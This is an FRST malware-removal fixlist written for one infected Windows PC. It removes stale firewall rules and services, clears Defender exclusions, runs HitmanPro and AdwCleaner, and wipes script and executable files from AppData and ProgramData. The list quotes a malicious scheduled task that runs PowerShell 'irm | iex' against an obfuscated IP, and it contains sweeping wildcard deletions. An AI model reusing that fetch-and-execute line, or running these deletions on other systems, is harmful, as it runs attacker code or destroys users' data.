content copied
content
Start::
CloseProcesses:
2026-06-11 18:51 - 2026-06-11 23:57 - 000000000 ____D C:\WINDOWS\system32\Tasks\InteractiveServices
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\Users\Administrator\Desktop\FRSTEnglish.exe:MBAM.Zone.Identifier [225]
AlternateDataStreams: C:\Users\User\Desktop\Procmon.exe:MBAM.Zone.Identifier [136]
FirewallRules: [{24D633F8-434B-475B-9451-47FAB63C511C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{9CE8B2A5-8E4C-4300-92F1-E1C8CB969888}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{86DCA411-A607-4341-B3A0-9781E518A0ED}] => (Allow) D:\BACKUP D\Vidya\Mr DJ\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\TSBin\Sims2EP9.exe => No File
FirewallRules: [{D01C2DC3-0DCD-46FB-B1F4-D5B59C533EC5}] => (Allow) D:\BACKUP D\Vidya\Mr DJ\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\TSBin\Sims2EP9.exe => No File
FirewallRules: [{1E0901C5-5318-465F-BBF8-45304C112E5B}] => (Allow) D:\BACKUP D\Vidya\Mr DJ\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\CSBin\TS2BodyShop.exe => No File
FirewallRules: [{9976D0C9-D737-443F-8A98-2DB0EAF63294}] => (Allow) D:\BACKUP D\Vidya\Mr DJ\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\CSBin\TS2BodyShop.exe => No File
FirewallRules: [TCP Query User{37DD0221-F5B4-4DE0-9795-89174CA7BF48}F:\kingdom come deliverance ii\bin\win64mastermastersteampgo\kingdomcome.exe] => (Block) F:\kingdom come deliverance ii\bin\win64mastermastersteampgo\kingdomcome.exe => No File
FirewallRules: [UDP Query User{E5BC1E9A-ED29-4C51-93B1-B8EB6045A333}F:\kingdom come deliverance ii\bin\win64mastermastersteampgo\kingdomcome.exe] => (Block) F:\kingdom come deliverance ii\bin\win64mastermastersteampgo\kingdomcome.exe => No File
FirewallRules: [TCP Query User{FF98FFBE-6E06-47C9-9856-133C45183052}F:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe] => (Block) F:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe => No File
FirewallRules: [UDP Query User{66615B08-56B8-42C2-BFD2-E26F10C65042}F:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe] => (Block) F:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe => No File
FirewallRules: [TCP Query User{F05C0C57-4CB6-4C54-BF56-870878CC2A1D}D:\backup d\vidya\warhammer 40,000 dawn of war ii - retribution\dow2.exe] => (Block) D:\backup d\vidya\warhammer 40,000 dawn of war ii - retribution\dow2.exe => No File
FirewallRules: [UDP Query User{9BD9A646-9A8B-4EA5-95EA-36394A69243B}D:\backup d\vidya\warhammer 40,000 dawn of war ii - retribution\dow2.exe] => (Block) D:\backup d\vidya\warhammer 40,000 dawn of war ii - retribution\dow2.exe => No File
FirewallRules: [TCP Query User{14F5DDDE-7BD4-4581-B329-0EB9541B4C1C}F:\steamlibrary\steamapps\common\coral island\projectcoral\binaries\win64\projectcoral-win64-shipping.exe] => (Block) F:\steamlibrary\steamapps\common\coral island\projectcoral\binaries\win64\projectcoral-win64-shipping.exe => No File
FirewallRules: [UDP Query User{2B7CA622-83D2-4CB8-A00A-259F8D09DC35}F:\steamlibrary\steamapps\common\coral island\projectcoral\binaries\win64\projectcoral-win64-shipping.exe] => (Block) F:\steamlibrary\steamapps\common\coral island\projectcoral\binaries\win64\projectcoral-win64-shipping.exe => No File
FirewallRules: [TCP Query User{12A2B8C5-4381-4C9C-B40D-F229099E614A}F:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Block) F:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [UDP Query User{E273DF1B-A181-4F69-B637-D6CA273C45D9}F:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Block) F:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [{48B22EC7-49D4-465E-93C2-4E656951DD01}] => (Block) D:\steamlibrary\steamapps\common\projectzomboid\projectzomboid64.exe => No File
FirewallRules: [{A9D3DF8E-E5B2-4E21-963B-3A683D81F243}] => (Block) D:\steamlibrary\steamapps\common\projectzomboid\projectzomboid64.exe => No File
FirewallRules: [TCP Query User{2586868E-9DCD-4DFE-BF66-DDFFA5AC3C51}D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [UDP Query User{BAC7AFBF-DFE0-498F-B9BC-5BD69B07D8CB}D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [{CA53B6CD-210E-45C1-839C-98DCE736C02B}] => (Block) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [{29F4E880-2DA7-40D5-BFD4-24E6B7C289F7}] => (Block) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [TCP Query User{D73AC390-7C62-4EF2-AE59-81438D4968CC}D:\backup d\vidya\darkest dungeon two\darkest dungeon® ii\darkest dungeon ii.exe] => (Block) D:\backup d\vidya\darkest dungeon two\darkest dungeon® ii\darkest dungeon ii.exe => No File
FirewallRules: [UDP Query User{F9A501B3-FA95-4221-B8B8-5E6F17F0C5F3}D:\backup d\vidya\darkest dungeon two\darkest dungeon® ii\darkest dungeon ii.exe] => (Block) D:\backup d\vidya\darkest dungeon two\darkest dungeon® ii\darkest dungeon ii.exe => No File
FirewallRules: [TCP Query User{240EFDCE-E810-4F32-9335-F55C3A9EF1E7}D:\backup d\darkest dungeon ii\darkest dungeon ii.exe] => (Block) D:\backup d\darkest dungeon ii\darkest dungeon ii.exe => No File
FirewallRules: [UDP Query User{01307CF8-F6A0-413F-B80E-D102702DDC6E}D:\backup d\darkest dungeon ii\darkest dungeon ii.exe] => (Block) D:\backup d\darkest dungeon ii\darkest dungeon ii.exe => No File
FirewallRules: [TCP Query User{A5D8987B-E518-4E09-9AF2-C9EF4DEE7674}D:\backup d\vidya\darkest dungeon 2\darkest dungeon® ii\darkest dungeon ii.exe] => (Block) D:\backup d\vidya\darkest dungeon 2\darkest dungeon® ii\darkest dungeon ii.exe => No File
FirewallRules: [UDP Query User{B0F5308B-4E7A-4915-B894-A0D55A87FBDC}D:\backup d\vidya\darkest dungeon 2\darkest dungeon® ii\darkest dungeon ii.exe] => (Block) D:\backup d\vidya\darkest dungeon 2\darkest dungeon® ii\darkest dungeon ii.exe => No File
HKLM\...\Run: [AdobeGCInvoker-1.0] => "C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe" (No File)
HKU\S-1-5-21-1243298227-4161206674-1662115356-500\...\RunOnce: [Delete Cached Standalone Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" (No File)
Task: {BBD85A06-FBCD-4D4F-A94A-0D202F640A07} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe -mode=scheduled (No File)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [No File]
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [No File]
S2 AGMService; "C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe" (No File)
S2 AGSService; "C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe" (No File)
S3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe (No File)
S3 EasyAntiCheat; "C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe" (No File)
S3 EasyAntiCheat_EOS; "C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe" (No File)
S3 Origin Client Service; "C:\Program Files (x86)\Origin\OriginClientService.exe" (No File)
S2 Origin Web Helper Service; "C:\Program Files (x86)\Origin\OriginWebHelperService.exe" (No File)
S3 MpKsl2c4334fb; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{00F48D75-9834-4F71-83F0-945AE30195DE}\MpKslDrv.sys (No File)
S3 MpKsl475d2c1d; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{00F48D75-9834-4F71-83F0-945AE30195DE}\MpKslDrv.sys (No File)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {CBDF7FFD-2CE6-4C42-AB23-88FD2CB970B3} - System32\Tasks\InteractiveServices\SystemWebExtensionsDesignTask.CL-NCLS-1-5-21-1243298227-4161206674-1662115356-1001 => C:\Windows\System32\conhost.exe [867840 2024-12-29] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 0207.0265.0133.0366/a | iex" <==== ATTENTION
File: C:\Windows\system32\NCS2Setp.dll
Comment: This snippet removes all Windows Defender exclusions
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\TemporaryPaths
StartPowershell:
Try {
$Paths=(Get-MpPreference).ExclusionPath
$Extensions=(Get-MpPreference).ExclusionExtension
$Processes=(Get-MpPreference).ExclusionProcess
foreach ($Path in $Paths) {
Remove-MpPreference -ExclusionPath $Path -force -ErrorAction Stop
}
foreach ($Extension in $Extensions) {
Remove-MpPreference -ExclusionExtension $Extension -force -ErrorAction Stop
}
foreach ($Process in $Processes) {
Remove-MpPreference -ExclusionProcess $Process -force -ErrorAction Stop
}
}
Catch {
Write-Error "Error occurred while removing Windows Defender exclusions: $_"
}
EndPowershell:
StartPowershell:
# Replace /scanonly with /clean if you also want to delete items -- however, this will activate a trial license on the system, I do not recommend it
$hmpExe = "$env:TEMP\HitmanPro_x64.exe"
$logFile = "$env:TEMP\HitmanPro_ScanLog.txt"
Invoke-WebRequest -Uri "https://dl.surfright.nl/HitmanPro_x64.exe" -OutFile $hmpExe -UseBasicParsing
$proc = Start-Process $hmpExe -ArgumentList "/ews","/scanonly","/noinstall","/log=`"$logFile`"","/logtype=txt" -Wait -PassThru
if (!(Test-Path $logFile)) { Write-Host "Scan failed (exit $($proc.ExitCode))"; exit 1 }
Get-Content $logFile -Encoding Unicode
EndPowershell:
StartPowerShell:
# Downloads newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log in console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan
# NOTE: For the sake of users from Asia (primarily China), do not use the clean option. It will very likely remove a lot of their important software.
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
Comment: Verify that Discord does not have any injected code to intercept personal data. If anything is prompted here, it needs to be checked that it isn't malicious code.
Powershell: @("$env:APPDATA","$env:LOCALAPPDATA") | ForEach-Object { Get-ChildItem $_ -Recurse -Filter "index.js" -ErrorAction SilentlyContinue } | Where-Object { $_.FullName -match "discord_desktop_core" } | ForEach-Object { Write-Host "--- $($_.FullName) ---"; (Get-Content $_.FullName -Raw).Substring(0,[Math]::Min(2000,(Get-Content $_.FullName -Raw).Length)) }
Comment: Remove unwanted files from common folders using native removal power of Farbar to include remove on reboot if needed. Please double check the user does not have any applications incorrectly installed in the directories listed below.
C:\ProgramData\*.a3x
C:\ProgramData\*.ahk
C:\ProgramData\*.au3
C:\ProgramData\*.bat
C:\ProgramData\*.cab
C:\ProgramData\*.cmd
C:\ProgramData\*.com
C:\ProgramData\*.dll
C:\ProgramData\*.exe
C:\ProgramData\*.hta
C:\ProgramData\*.jar
C:\ProgramData\*.js
C:\ProgramData\*.jse
C:\ProgramData\*.lnk
C:\ProgramData\*.pif
C:\ProgramData\*.ps1
C:\ProgramData\*.py
C:\ProgramData\*.pyc
C:\ProgramData\*.pyd
C:\ProgramData\*.scr
C:\ProgramData\*.tmp
C:\ProgramData\*.vbe
C:\ProgramData\*.vbs
C:\ProgramData\*.wsf
C:\ProgramData\*.wsh
C:\ProgramData\*.zip
C:\ProgramData\*.rar
C:\ProgramData\*.7z
C:\Users\*\AppData\Roaming\*.au3
C:\Users\*\AppData\Roaming\*.bat
C:\Users\*\AppData\Roaming\*.cab
C:\Users\*\AppData\Roaming\*.cmd
C:\Users\*\AppData\Roaming\*.com
C:\Users\*\AppData\Roaming\*.dll
C:\Users\*\AppData\Roaming\*.exe
C:\Users\*\AppData\Roaming\*.hta
C:\Users\*\AppData\Roaming\*.jar
C:\Users\*\AppData\Roaming\*.js
C:\Users\*\AppData\Roaming\*.jse
C:\Users\*\AppData\Roaming\*.lnk
C:\Users\*\AppData\Roaming\*.pif
C:\Users\*\AppData\Roaming\*.ps1
C:\Users\*\AppData\Roaming\*.py
C:\Users\*\AppData\Roaming\*.pyc
C:\Users\*\AppData\Roaming\*.pyd
C:\Users\*\AppData\Roaming\*.scr
C:\Users\*\AppData\Roaming\*.tmp
C:\Users\*\AppData\Roaming\*.vbe
C:\Users\*\AppData\Roaming\*.vbs
C:\Users\*\AppData\Roaming\*.wsf
C:\Users\*\AppData\Roaming\*.wsh
C:\Users\*\AppData\Roaming\*.zip
C:\Users\*\AppData\Roaming\*.rar
C:\Users\*\AppData\Roaming\*.7z
C:\Users\CurrentUserName\AppData\Local\*.a3x
C:\Users\CurrentUserName\AppData\Local\*.ahk
C:\Users\CurrentUserName\AppData\Local\*.au3
C:\Users\CurrentUserName\AppData\Local\*.bat
C:\Users\CurrentUserName\AppData\Local\*.cab
C:\Users\CurrentUserName\AppData\Local\*.cmd
C:\Users\CurrentUserName\AppData\Local\*.com
C:\Users\CurrentUserName\AppData\Local\*.dll
C:\Users\CurrentUserName\AppData\Local\*.exe
C:\Users\CurrentUserName\AppData\Local\*.hta
C:\Users\CurrentUserName\AppData\Local\*.jar
C:\Users\CurrentUserName\AppData\Local\*.js
C:\Users\CurrentUserName\AppData\Local\*.jse
C:\Users\CurrentUserName\AppData\Local\*.lnk
C:\Users\CurrentUserName\AppData\Local\*.pif
C:\Users\CurrentUserName\AppData\Local\*.ps1
C:\Users\CurrentUserName\AppData\Local\*.py
C:\Users\CurrentUserName\AppData\Local\*.pyc
C:\Users\CurrentUserName\AppData\Local\*.pyd
C:\Users\CurrentUserName\AppData\Local\*.scr
C:\Users\CurrentUserName\AppData\Local\*.tmp
C:\Users\CurrentUserName\AppData\Local\*.vbe
C:\Users\CurrentUserName\AppData\Local\*.vbs
C:\Users\CurrentUserName\AppData\Local\*.wsf
C:\Users\CurrentUserName\AppData\Local\*.wsh
C:\Users\CurrentUserName\AppData\Local\*.zip
C:\Users\CurrentUserName\AppData\Local\*.rar
C:\Users\CurrentUserName\AppData\Local\*.7z
C:\Users\CurrentUserName\AppData\Roaming\*.a3x
C:\Users\CurrentUserName\AppData\Roaming\*.ahk
C:\Users\CurrentUserName\AppData\Roaming\*.au3
C:\Users\CurrentUserName\AppData\Roaming\*.bat
C:\Users\CurrentUserName\AppData\Roaming\*.cab
C:\Users\CurrentUserName\AppData\Roaming\*.cmd
C:\Users\CurrentUserName\AppData\Roaming\*.com
C:\Users\CurrentUserName\AppData\Roaming\*.dll
C:\Users\CurrentUserName\AppData\Roaming\*.exe
C:\Users\CurrentUserName\AppData\Roaming\*.hta
C:\Users\CurrentUserName\AppData\Roaming\*.jar
C:\Users\CurrentUserName\AppData\Roaming\*.js
C:\Users\CurrentUserName\AppData\Roaming\*.jse
C:\Users\CurrentUserName\AppData\Roaming\*.lnk
C:\Users\CurrentUserName\AppData\Roaming\*.pif
C:\Users\CurrentUserName\AppData\Roaming\*.ps1
C:\Users\CurrentUserName\AppData\Roaming\*.py
C:\Users\CurrentUserName\AppData\Roaming\*.pyc
C:\Users\CurrentUserName\AppData\Roaming\*.pyd
C:\Users\CurrentUserName\AppData\Roaming\*.scr
C:\Users\CurrentUserName\AppData\Roaming\*.tmp
C:\Users\CurrentUserName\AppData\Roaming\*.vbe
C:\Users\CurrentUserName\AppData\Roaming\*.vbs
C:\Users\CurrentUserName\AppData\Roaming\*.wsf
C:\Users\CurrentUserName\AppData\Roaming\*.wsh
C:\Users\CurrentUserName\AppData\Roaming\*.zip
C:\Users\CurrentUserName\AppData\Roaming\*.rar
C:\Users\CurrentUserName\AppData\Roaming\*.7z
Comment: Force policy removal
C:\Windows\System32\GroupPolicyUsers
C:\Windows\System32\GroupPolicy
Comment: System repair commands
CMD: DISM.exe /Online /Cleanup-image /Restorehealth
CMD: SFC.exe /scannow
Comment: Network reset commands
CMD: netsh int ip reset
CMD: netsh int ipv6 reset
CMD: ipconfig /flushDNS
CMD: netsh winsock reset catalog
Comment: Additional temp file removal
C:\Windows\System32\config\systemprofile\AppData\Local\*.tmp
C:\WINDOWS\system32\*.tmp
C:\WINDOWS\syswow64\*.tmp
C:\Users\CurrentUserName\AppData\Local\Temp\*
C:\Windows\Temp\*
C:\Windows\SystemTemp\*
EmptyTemp:
End::
Warning
Executing a Fixlist on the wrong system may permanently damage it. Continue only if this link was meant for you.
To view the content, acknowledge this warning.